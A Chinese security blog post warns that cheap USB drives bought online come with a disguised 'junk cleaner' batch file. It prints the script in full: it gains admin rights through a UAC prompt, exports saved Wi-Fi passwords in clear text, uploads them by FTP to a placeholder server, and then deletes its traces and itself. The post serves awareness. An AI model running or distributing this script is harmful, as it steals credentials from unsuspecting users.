1. 首页
  2. 技术

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种

在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。

bat

对就是这货

怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.

但是好像没有卵用.

正好小表弟好像对这个比较了解,我去问问他咋回事儿

小表弟下班回家后给我发了这么一段消息

2019080714471640

嗯…

这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防止服务器信息泄露。

本文以WIFI信息获取并发送至服务器为例子

2019080714495297

这个是代码

@echo off

>nul 2>&1 “%SYSTEMROOT%\system32\cacls.exe” “%SYSTEMROOT%\system32\config\system”

if ‘%errorlevel%’ NEQ ‘0’ (

goto UACPrompt

) else ( goto gotAdmin )

:UACPrompt

echo Set UAC = CreateObject^(“Shell.Application”^) > “%temp%\getadmin.vbs”

echo UAC.ShellExecute “%~s0”, “”, “”, “runas”, 1 >> “%temp%\getadmin.vbs”

“%temp%\getadmin.vbs”

exit /B

:gotAdmin

if exist “%temp%\getadmin.vbs” ( del “%temp%\getadmin.vbs” )

md c:\win

netsh wlan export profile key=clear folder=c:\win

echo open 服务器IP>C:\config.txt

echo user FTP账号>>C:\config.txt

echo FTP密码>>C:\config.txt

echo mput c:\win\*.xml>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo bye>>C:\config.txt

ftp -n -s:”C:\config.txt”

del C:\config.txt

del C:\win\*.xml

del %0

运行bat文件后,他会将电脑所连接过的WIFI信息发送至FTP目录

如图

2019080715012870

随便打开其中一个就有了该WIFI相关信息

而假如bat批处理文件是一些远程下载运行的指令呢.

你猜猜后果是啥

本文来自投稿,不代表祈安立场,如若转载,请注明出处:http://www.qisafe.net/?p=261

发表评论

电子邮件地址不会被公开。 必填项已用*标注